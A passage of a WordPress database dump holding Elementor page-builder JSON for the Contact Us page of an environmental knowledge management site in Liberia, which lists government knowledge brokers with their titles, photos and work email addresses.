href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23127,3344,'_elementor_edit_mode','builder'),(23128,3344,'_elementor_template_type','wp-page'),(23129,3344,'_elementor_version','3.0.16'),(23130,3344,'_wp_page_template','default'),(23131,3344,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br 